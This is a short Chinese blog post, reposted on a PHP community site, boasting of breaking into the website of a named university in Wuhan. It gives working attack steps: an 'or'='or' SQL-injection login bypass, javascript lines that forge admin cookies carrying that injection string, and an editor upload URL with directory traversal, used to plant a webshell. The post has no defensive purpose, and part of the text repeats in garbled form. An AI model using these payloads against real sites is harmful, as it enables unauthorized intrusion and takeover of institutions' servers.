当前位置:  首页  >  服务器技术  >  Linux/unix  >  Linux教程

检测武汉地质大学

xiaoweiblogwww.xiaoweio.cn1.GG踩点后发现很多漏洞2用oror进了个后台,通过编辑器拿下shell其中的编辑器是通过其他站的讯实系统cookies直接跨目录找到数据库登录的,这其中有俩EWB一个用来找目录一个用来拿shell,讯实当然可以拿shell了,但是

 xiaowei'blog www.xiaoweio.cn

1.GG踩点后发现很多漏洞

2用'or'='or' 进了个后台,通过编辑器拿下shell

其中的编辑器是通过其他站的讯实系统cookies 直接跨目录找到数据库登录的,

这其中有俩EWB 一个用来找目录 一个用来拿shell,讯实当然可以拿shell了,但是备

份不站点哪出问题了,传图片不显示。。。。

javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));

/edit/admin_uploadfile.asp?id=14&dir=..

呵呵 。。。

吐了个 "CAO" !
扫码关注 PHP1 官方微信号
PHP1.CN | 中国最专业的PHP中文社区 | PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | PHP问答
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved PHP1.CN 第一PHP社区 版权所有